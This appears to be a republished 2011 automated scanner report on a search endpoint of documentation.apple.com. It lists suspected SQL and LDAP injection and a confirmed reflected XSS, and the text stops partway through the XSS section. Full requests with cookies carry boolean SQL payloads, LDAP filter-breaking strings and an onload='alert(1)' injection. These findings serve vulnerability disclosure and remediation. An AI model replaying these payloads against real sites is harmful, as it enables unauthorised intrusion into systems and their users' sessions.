XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, documentation.apple.com

Report generated by XSS.CX at Wed Jul 20 06:06:15 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://documentation.apple.com/cgi-bin/sp/nph-search [name of an arbitrarily supplied request parameter]

1.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]

2. LDAP injection

3. Cross-site scripting (reflected)

3.1. http://documentation.apple.com/cgi-bin/sp/nph-search [getfields parameter]

3.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]

4. Credit card numbers disclosed

5. Robots.txt file

6. Content type incorrectly stated


1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://documentation.apple.com/cgi-bin/sp/nph-search [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 82552428'%20or%201%3d1--%20 and 82552428'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss&182552428'%20or%201%3d1--%20=1 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 1

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1059
Vary: Accept-Encoding
Cache-Control: max-age=543
Expires: Fri, 15 Jul 2011 20:20:19 GMT
Date: Fri, 15 Jul 2011 20:11:16 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.020032"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.24","name":"ip","original_value":"17.149.0.24"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"}]}}

Request 2

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss&182552428'%20or%201%3d2--%20=1 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 2

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1109
Vary: Accept-Encoding
Cache-Control: max-age=564
Expires: Fri, 15 Jul 2011 20:20:41 GMT
Date: Fri, 15 Jul 2011 20:11:17 GMT
Connection: close

{"GSP":{"Q":{"$t":"xss"},"TM":{"$t":"0.018473"},"VER":"3.2","PARAM":[{"value":"xss","name":"q","original_value":"xss"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.21","name":"ip","original_value":"17.149.0.21"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"},{"value":"0","name":"entsp","original_value":"0"}]}}
1.2. http://documentation.apple.com/cgi-bin/sp/nph-search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The q parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss'%20and%201%3d1--%20 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 1

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1187
Vary: Accept-Encoding
Cache-Control: max-age=549
Expires: Fri, 15 Jul 2011 20:20:18 GMT
Date: Fri, 15 Jul 2011 20:11:09 GMT
Connection: close

{"GSP":{"Spelling":{"Suggestion":{"$t":"<b><i>x ss</i></b>&#39; and 1=1--","q":"x ss' and 1=1--"}},"Q":{"$t":"xss' and 1=1--"},"TM":{"$t":"0.023180"},"VER":"3.2","PARAM":[{"value":"xss' and 1=1-- ","n
...[SNIP]...
_value":"0"},{"value":"17.149.0.23","name":"ip","original_value":"17.149.0.23"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"}]}}

Request 2

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=xss'%20and%201%3d2--%20 HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 2

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1237
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 20:21:09 GMT
Date: Fri, 15 Jul 2011 20:11:09 GMT
Connection: close

{"GSP":{"Spelling":{"Suggestion":{"$t":"<b><i>x ss</i></b>&#39; and 1=2--","q":"x ss' and 1=2--"}},"Q":{"$t":"xss' and 1=2--"},"TM":{"$t":"0.018260"},"VER":"3.2","PARAM":[{"value":"xss' and 1=2-- ","n
...[SNIP]...
value":"0"},{"value":"17.149.0.23","name":"ip","original_value":"17.149.0.23"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"},{"value":"0","name":"entsp","original_value":"0"}]}}
2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The q parameter appears to be vulnerable to LDAP injection attacks.

The payloads 3097717966f67c5a)(sn=* and 3097717966f67c5a)!(sn=* were each submitted in the q parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=3097717966f67c5a)(sn=* HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 1

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1168
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Fri, 15 Jul 2011 20:27:29 GMT
Date: Fri, 15 Jul 2011 20:17:29 GMT
Connection: close

{"GSP":{"Q":{"$t":"3097717966f67c5a)(sn=*"},"TM":{"$t":"0.020022"},"VER":"3.2","PARAM":[{"value":"3097717966f67c5a)(sn=*","name":"q","original_value":"3097717966f67c5a)(sn%3D*"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.22","name":"ip","original_value":"17.149.0.22"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"},{"value":"0","name":"entsp","original_value":"0"}]}}

Request 2

GET /cgi-bin/sp/nph-search?getfields=bookName.pageName.ApplicationName&q=3097717966f67c5a)!(sn=* HTTP/1.1
Host: documentation.apple.com
Proxy-Connection: keep-alive
Referer: http://documentation.apple.com/search/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1310659144373'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D5%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D3%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D4%3Bch%3Dretailstore%26vn%3D3%3Bch%3Dbuy%26vn%3D3%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D1%3B; ccl=ZhJSf6TmLo5dfUYpLbN0p3oQtTKNSYKyhmydPiiwo79WlvBQ36zQIaXx9IhEXh1LrlyI9NowXVv36tRIIA26djndD9Jur49oRSXcWEQ6pFqgLkr++HWRHbqFQwUCwNCxYopAMHFc1Z+z7zGxdy2eAvoiH7nxUefRG/06PdRATsIPtxP9wEIFQXpFTEjroU/y0URQ99yPV4fnKK9C7JSBBpnD0cMmWGkxTzScI8/vOzRhWjb9UDZibJRuG9rb2GBjrqY6loZHbGoblcvk2LZjJS5sOUA1r+jMf1P0o1GnwScKlFEOOd68vgUC3HHORsVg3FERZQsHHrMqe2GGTIsnx4q3V+LyE/B8hyZ6xQ8QZMVFdX6/jWfum6BT2ms1iahgkuh5LdW/cFUk/bBthYd03sW4lD18a27kLVffRUgNBFWmsEB7cpYOhsgzesntgmHPXf0kkF58c+hhQuO9uavT2Wgccso6bHUGYt6m3ravVDnvrt+4IUEVpBkX8hgFz/DL80sNZZO77MCO9kutXtgVV9fxExK1Bad3OLKvWfB88LylvOsCdXsst03GnaP2HvsP; geo=US

Response 2

HTTP/1.1 200 OK
Server: Apache 1.3.6 OS X
Content-Type: text/xml
Content-Length: 1121
Vary: Accept-Encoding
Cache-Control: max-age=572
Expires: Fri, 15 Jul 2011 20:27:02 GMT
Date: Fri, 15 Jul 2011 20:17:30 GMT
Connection: close

{"GSP":{"Q":{"$t":"3097717966f67c5a)!(sn=*"},"TM":{"$t":"0.016935"},"VER":"3.2","PARAM":[{"value":"3097717966f67c5a)!(sn=*","name":"q","original_value":"3097717966f67c5a)!(sn%3D*"},{"value":"xml","name":"output","original_value":"xml"},{"value":"default_frontend","name":"client","original_value":"default_frontend"},{"value":"documentation","name":"site","original_value":"documentation"},{"value":"","name":"start","original_value":""},{"value":"p","name":"access","original_value":"p"},{"value":"50","name":"num","original_value":"50"},{"value":"lang_en","name":"lr","original_value":"lang_en"},{"value":"UTF-8","name":"oe","original_value":"UTF-8"},{"value":"UTF-8","name":"ie","original_value":"UTF-8"},{"value":"bookName.pageName.ApplicationName","name":"getfields","original_value":"bookName.pageName.ApplicationName"},{"value":"0","name":"numgm","original_value":"0"},{"value":"0","name":"filter","original_value":"0"},{"value":"17.149.0.23","name":"ip","original_value":"17.149.0.23"},{"value":"date:D:L:d1","name":"sort","original_value":"date%3AD%3AL%3Ad1"},{"value":"0","name":"entqr","original_value":"0"}]}}
3. Cross-site scripting (reflected)  previous  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://documentation.apple.com/cgi-bin/sp/nph-search [getfields parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://documentation.apple.com
Path:   /cgi-bin/sp/nph-search

Issue detail

The value of the getfields request parameter is copied into the XML document as plain text between tags. The payload ebced<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8651bd2c284 was submitted in the getfields parameter. This input was echoed as ebced<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8651bd2c284 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

